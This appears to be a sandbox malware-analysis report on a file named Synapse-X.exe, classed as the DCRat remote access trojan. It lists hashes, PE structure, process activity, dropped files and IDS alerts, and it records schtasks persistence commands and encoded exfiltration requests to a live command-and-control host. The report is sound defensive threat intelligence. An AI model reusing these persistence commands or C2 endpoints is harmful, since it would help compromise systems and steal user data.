File name: | Synapse-X.exe |
---|---|
Full analysis: | https://app.any.run/tasks/28f142b1-5bfc-4e2d-91ba-bab175ad4451 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | August 12, 2022, 17:13:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | E588B605509B6B0171A09CDF688E1499 |
SHA1: | CA39D2A5ABA5DF9CEB94C7A346758FEA4005E8ED |
SHA256: | A1F7263481666C878066EADEB661EC6D7AD5257B5D2A084F670E56F97FC75662 |
SSDEEP: | 24576:i2G/nvxW3WwSqsJBnVFEM7DwMZJ+FcNnbd6UubVY2Xjt3oikB987UiMaw53Q6im2:ibA3eDJRVFEMDwMexxt3oxB9ri/6zim2 |

.exe | Win32 Executable (generic) (52.9) |
---|---|
.exe | Generic Win/DOS Executable (23.5) |
.exe | DOS Executable Generic (23.5) |

Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1ec40 |
UninitializedDataSize: | - |
InitializedDataSize: | 445952 |
CodeSize: | 201216 |
LinkerVersion: | 14 |
PEType: | PE32 |
TimeStamp: | 2020:12:01 19:00:55+01:00 |
MachineType: | Intel 386 or later, and compatibles |

Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Dec-2020 18:00:55 |

Detected languages: | |
---|---|
Debug artifacts: | |

Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000118 |

Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 6 |
Time date stamp: | 01-Dec-2020 18:00:55 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |

Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000310EA | 0x00031200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.70808 |
.rdata | 0x00033000 | 0x0000A612 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.22174 |
.data | 0x0003E000 | 0x00023728 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.70882 |
.didat | 0x00062000 | 0x00000188 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.29825 |
.rsrc | 0x00063000 | 0x0005EFA8 | 0x0005F000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.26357 |
.reloc | 0x000C2000 | 0x00002268 | 0x00002400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.55486 |

Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.25329 | 1875 | Latin 1 / Western European | English - United States | RT_MANIFEST |
2 | 3.92488 | 4264 | Latin 1 / Western European | Process Default Language | RT_ICON |
3 | 3.51636 | 9640 | Latin 1 / Western European | Process Default Language | RT_ICON |
4 | 3.37366 | 16936 | Latin 1 / Western European | Process Default Language | RT_ICON |
5 | 3.0076 | 67624 | Latin 1 / Western European | Process Default Language | RT_ICON |
6 | 2.81335 | 270376 | Latin 1 / Western European | Process Default Language | RT_ICON |
7 | 3.1586 | 482 | Latin 1 / Western European | English - United States | RT_STRING |
8 | 3.11685 | 460 | Latin 1 / Western European | English - United States | RT_STRING |
9 | 3.11236 | 440 | Latin 1 / Western European | English - United States | RT_STRING |
10 | 2.99727 | 326 | Latin 1 / Western European | English - United States | RT_STRING |

KERNEL32.dll |
---|
USER32.dll (delay-loaded) |
gdiplus.dll |

PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2988 | "C:\Users\admin\AppData\Local\Temp\Synapse-X.exe" | C:\Users\admin\AppData\Local\Temp\Synapse-X.exe | | Explorer.EXE | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
3292 | "C:\Windows\System32\WScript.exe" "C:\containerproviderwinMonitornet\YBw7wehZE.vbe" | C:\Windows\System32\WScript.exe | — | Synapse-X.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Version: 5.8.7600.16385 |
1604 | "C:\Windows\System32\WScript.exe" "C:\containerproviderwinMonitornet\file.vbs" | C:\Windows\System32\WScript.exe | — | Synapse-X.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
3504 | C:\Windows\system32\cmd.exe /c ""C:\containerproviderwinMonitornet\zl43VDdzohZNYOxfaG6.bat" " | C:\Windows\system32\cmd.exe | — | Synapse-X.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1308 | C:\Windows\system32\cmd.exe /c ""C:\containerproviderwinMonitornet\qfYwvUj1IL25WpZEYS26.bat" " | C:\Windows\system32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1764 | "C:\containerproviderwinMonitornet\chainportPerf.exe" | C:\containerproviderwinMonitornet\chainportPerf.exe | | cmd.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0; Version: 1.1.1o |
3084 | schtasks.exe /create /tn "SearchIndexerS" /sc MINUTE /mo 10 /tr "'C:\containerproviderwinMonitornet\SearchIndexer.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3320 | schtasks.exe /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\containerproviderwinMonitornet\SearchIndexer.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1492 | schtasks.exe /create /tn "SearchIndexerS" /sc MINUTE /mo 6 /tr "'C:\containerproviderwinMonitornet\SearchIndexer.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3388 | schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\containerproviderwinMonitornet\wscript.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |

PID | Process | Key | Name | Operation | Value |
---|---|---|---|---|---|
2988 | Synapse-X.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
2988 | Synapse-X.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
2988 | Synapse-X.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
2988 | Synapse-X.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
3292 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
3292 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
3292 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
3292 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
1764 | chainportPerf.exe | HKEY_CURRENT_USER\Software\356ce7c432ee6efe9c8e8b7282c665c2150b68d0 | 4f877e793dcafea2e76326fb4761140cb447fe96 | write | [omitted] |
1764 | chainportPerf.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |

PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2988 | Synapse-X.exe | C:\containerproviderwinMonitornet\qfYwvUj1IL25WpZEYS26.bat | text | E197FD2BC79F39E36349D5A09CE1C0DA | 286980B36073257084984E9A2EBA1357CF1BF25C793348128F2765174D099D38 |
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\4a1145983886ca | text | 033AA58E63BB879C8942FAC00487EACE | 62E62F44F25928DB9153EE7CC5BDAE487E2DFA1CE319B7CE9D5E880635E3C498 |
2988 | Synapse-X.exe | C:\containerproviderwinMonitornet\chainportPerf.exe | executable | 7348C8F3302A008212D50836C92E07B7 | 9A227BAD0FC850E0271D3154F9A950A5587E631A287B074CC18016929B255461 |
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\wscript.exe | executable | 7348C8F3302A008212D50836C92E07B7 | 9A227BAD0FC850E0271D3154F9A950A5587E631A287B074CC18016929B255461 |
1764 | chainportPerf.exe | C:\MSOCache\All Users\{90140000-0101-0419-0000-0000000FF1CE}-C\27d1bcfc3c54e0 | text | 044A856019E838A275FE467AECB634FC | 245ED3AEAE9DB880C18F74EA9A34AA5232FDC09FD8ED97904186588D7956E61A |
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\817c8c8ec737a7 | text | 6D0C81FC0E8D964B6E24D062D2EC03BE | 0C9E9802702896893E7888DBA6BF0B9F8E3A06E848E0F7D4E0AB2849747B7929 |
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\101b941d020240 | text | E9AED91D6D5B802635469BFD1B9276EA | 09FA093BBA27A741F74877C5E5FF3DD6852B6D4E39AFC988C65113EB49AE4B7A |
1764 | chainportPerf.exe | C:\MSOCache\All Users\{90140000-00BA-0412-0000-0000000FF1CE}-C\886983d96e3d3e | text | 517FAD4E05BD7A4752A9481FA52D1116 | F7153394992007BD0A8AB9A05938D9E2448F1C6807B920273C7240B39BBA5064 |
2988 | Synapse-X.exe | C:\containerproviderwinMonitornet\zl43VDdzohZNYOxfaG6.bat | text | DD9794AEAF627741D9020D7E3AB875DA | 8ADE9E51571D4AC3E60452D18E8B9DEBF92DD479D165606A4D4ED638EEAE1E7B |
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\lsm.exe | executable | 7348C8F3302A008212D50836C92E07B7 | 9A227BAD0FC850E0271D3154F9A950A5587E631A287B074CC18016929B255461 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1284 | System.exe | GET | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&0937c7bd48c1c66f9d1e0e6185f90034=d1nI2AzNwkzNlJmM2ATM0UmNjV2Y0IGNhNzMxYDMhVmMyQzYyY2NygDO2IiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W&e15ac3c90300a65a7efb4543f78b520e=[omitted] | RU | — | — | malicious |
1284 | System.exe | GET | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=QX9JSUNJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIlNjZyMGN2Q2YiZGZ3QGM2MjYmJWZ4MzN0YmMkJ2YmFjY4MWN2QGNiJiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | — | — | malicious |
1284 | System.exe | GET | 200 | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?UgFQrrKaSfzMNXUdqeIjlZAf=ZdJSdmJf0yX249PSg&363bbe2f2c10bcde4dcfd059aaf5a188=38b973380116c0096dfc620fa79b2496&78944e2dd7ce106262f5ea04819b1571=wY4UWMhNDN0kDMyUDZ2UjZkVTZyYzY2YmM4cDM0kTM4MGZ1kzY1ATN&UgFQrrKaSfzMNXUdqeIjlZAf=ZdJSdmJf0yX249PSg | RU | text | 2.06 Kb | malicious |
1284 | System.exe | GET | 200 | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&25a9018383d414fe6ced6a8c64e3bf80=[omitted] | RU | text | 2.06 Kb | malicious |
1284 | System.exe | POST | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM | RU | — | — | malicious |
1284 | System.exe | GET | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=QX9JSUNJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIlNjZyMGN2Q2YiZGZ3QGM2MjYmJWZ4MzN0YmMkJ2YmFjY4MWN2QGNiJiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | — | — | malicious |
1284 | System.exe | POST | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM | RU | — | — | malicious |
1284 | System.exe | GET | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=QX9JSUNJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIlNjZyMGN2Q2YiZGZ3QGM2MjYmJWZ4MzN0YmMkJ2YmFjY4MWN2QGNiJiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | — | — | malicious |
1284 | System.exe | GET | 200 | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=QX9JSUNJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIlNjZyMGN2Q2YiZGZ3QGM2MjYmJWZ4MzN0YmMkJ2YmFjY4MWN2QGNiJiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | text | 696 b | malicious |
1284 | System.exe | GET | 200 | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=0VfisWaRxkQp5UM0MUTyc2QJJTUU5keZpWT3RzQNd3bE10dvRUT3FUaPxWMXFGMCNkWs5ESjhGeXJ1ZFNlW1lzRSJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIhFGNlhzN4IDN1ATZhhzY1gDOkRGZ4MzMyEzNwIWYiFGMiJjZxEDZwIiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | text | 696 b | malicious |

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 141.8.193.236:80 | f0707008.xsph.ru | Sprinthost.ru LLC | RU | malicious |
1284 | System.exe | 141.8.193.236:80 | f0707008.xsph.ru | Sprinthost.ru LLC | RU | malicious |

Domain | IP | Reputation |
---|---|---|
f0707008.xsph.ru | | malicious |

PID | Process | Class | Message |
---|---|---|---|
1284 | System.exe | A Network Trojan was detected | ET TROJAN DCRAT Activity (GET) |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
1284 | System.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
1284 | System.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
1284 | System.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
1284 | System.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |